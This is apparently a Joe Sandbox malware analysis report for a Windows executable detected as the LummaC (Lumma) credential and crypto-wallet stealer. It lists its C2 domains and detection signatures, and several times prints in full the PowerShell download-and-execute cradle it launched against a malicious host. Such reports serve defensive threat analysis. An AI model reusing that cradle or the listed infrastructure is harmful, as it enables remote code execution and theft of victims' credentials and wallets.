Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Active_Setup.exe

Overview

General Information

Sample name:Active_Setup.exe
Analysis ID:1582495
MD5:b106a3a66916985d5e5b6cbbb6c5b07c
SHA1:91ac93059958c0267bd8a909ed83284fdc8e4c7d
SHA256:195f6445fe4cc70d48c65e973008336c82a0455163e51152c05f2b4ce32963f5
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Active_Setup.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Active_Setup.exe" MD5: B106A3A66916985D5E5B6CBBB6C5B07C)
    • powershell.exe (PID: 7956 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["noisycuttej.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop", "nearycrepso.shop", "cryofficesj.click", "abruptyopsn.shop"], "Build id": "hRjzG3--ZINA"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x4d063:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      00000000.00000003.1860274897.0000000000BD4000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Active_Setup.exe PID: 7532JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Active_Setup.exe PID: 7532JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: PowerShell Download and Execution Cradles
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Active_Setup.exe", ParentImage: C:\Users\user\Desktop\Active_Setup.exe, ParentProcessId: 7532, ParentProcessName: Active_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, ProcessId: 7956, ProcessName: powershell.exe
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Active_Setup.exe", ParentImage: C:\Users\user\Desktop\Active_Setup.exe, ParentProcessId: 7532, ParentProcessName: Active_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, ProcessId: 7956, ProcessName: powershell.exe
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Active_Setup.exe", ParentImage: C:\Users\user\Desktop\Active_Setup.exe, ParentProcessId: 7532, ParentProcessName: Active_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, ProcessId: 7956, ProcessName: powershell.exe
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Active_Setup.exe", ParentImage: C:\Users\user\Desktop\Active_Setup.exe, ParentProcessId: 7532, ParentProcessName: Active_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, ProcessId: 7956, ProcessName: powershell.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Active_Setup.exe", ParentImage: C:\Users\user\Desktop\Active_Setup.exe, ParentProcessId: 7532, ParentProcessName: Active_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, ProcessId: 7956, ProcessName: powershell.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Active_Setup.exe", ParentImage: C:\Users\user\Desktop\Active_Setup.exe, ParentProcessId: 7532, ParentProcessName: Active_Setup.exe, ProcessCommandLine: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;, ProcessId: 7956, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:19:11.591616+010020283713Unknown Traffic192.168.2.449730188.114.97.3443TCP
              2024-12-30T18:19:12.741413+010020283713Unknown Traffic192.168.2.449731188.114.97.3443TCP
              2024-12-30T18:19:13.996351+010020283713Unknown Traffic192.168.2.449732188.114.97.3443TCP
              2024-12-30T18:19:15.154663+010020283713Unknown Traffic192.168.2.449733188.114.97.3443TCP
              2024-12-30T18:19:16.620362+010020283713Unknown Traffic192.168.2.449734188.114.97.3443TCP
              2024-12-30T18:19:19.923859+010020283713Unknown Traffic192.168.2.449737188.114.97.3443TCP
              2024-12-30T18:19:20.992784+010020283713Unknown Traffic192.168.2.449740188.114.97.3443TCP
              2024-12-30T18:19:23.166550+010020283713Unknown Traffic192.168.2.449743188.114.97.3443TCP
              2024-12-30T18:19:25.275090+010020283713Unknown Traffic192.168.2.449744188.114.97.3443TCP
              2024-12-30T18:19:26.632901+010020283713Unknown Traffic192.168.2.449745185.161.251.21443TCP
              2024-12-30T18:19:27.076691+010020283713Unknown Traffic192.168.2.449746104.21.37.128443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:19:12.261155+010020546531A Network Trojan was detected192.168.2.449730188.114.97.3443TCP
              2024-12-30T18:19:13.229866+010020546531A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
              2024-12-30T18:19:25.778758+010020546531A Network Trojan was detected192.168.2.449744188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:19:12.261155+010020498361A Network Trojan was detected192.168.2.449730188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:19:13.229866+010020498121A Network Trojan was detected192.168.2.449731188.114.97.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-12-30T18:19:22.172959+010020480941Malware Command and Control Activity Detected192.168.2.449740188.114.97.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://cegu.shop/Avira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtn8JAvira URL Cloud: Label: malware
              Source: https://dfgh.onlineAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/Avira URL Cloud: Label: malware
              Source: https://dfgh.online/invoker.php?compname=Avira URL Cloud: Label: malware
              Source: https://dfgh.online/Avira URL Cloud: Label: malware
              Source: https://dfgh.online/invoker.php?compName=user-PCAvira URL Cloud: Label: malware
              Source: https://dfgh.online/invoker.php?compName=user-PCtAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtG3Avira URL Cloud: Label: malware
              Found malware configuration
              Source: Active_Setup.exe.7532.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop", "nearycrepso.shop", "cryofficesj.click", "abruptyopsn.shop"], "Build id": "hRjzG3--ZINA"}
              Multi AV Scanner detection for submitted file
              Source: Active_Setup.exeReversingLabs: Detection: 18%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.7% probability
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: cryofficesj.click
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--ZINA
              Source: Active_Setup.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
              Source: Active_Setup.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1940316473.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbes source: powershell.exe, 00000004.00000002.1944489969.00000000072B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\AWork\DRW15.8AB3\sharelib\EuDownloadPublicLibrary\x86\exe\EuDownload.pdb source: Active_Setup.exe
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01084079 __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,0_2_01084079
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 0_2_01083B05 __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose,0_2_01083B05
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h0_2_0095E045
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov esi, ecx0_2_0095E045
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+4992E1F9h]0_2_0096C11C
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00958292
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx edi, byte ptr [ecx+esi]0_2_009442E6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00980246
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then jmp dword ptr [0044664Ch]0_2_0096838E
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax+18h]0_2_0095C3FD
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov dword ptr [esp+04h], eax0_2_009586F3
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax]0_2_0097C616
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov byte ptr [edi], bl0_2_0094A616
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h0_2_0095A646
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-000000CFh]0_2_0095A646
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+00000084h]0_2_0095A646
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx edi, byte ptr [esp+eax+0Ch]0_2_0095A646
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h0_2_0095A646
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov byte ptr [esi], al0_2_0095C89B
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx esi, byte ptr [edi]0_2_0094A886
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov edx, ecx0_2_0094E8D6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0096487E
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0096A9B6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]0_2_00948AA6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]0_2_00948AA6
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then mov edx, dword ptr [ebp-18h]0_2_0097EA13
              Source: C:\Users\user\Desktop\Active_Setup.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00976A26
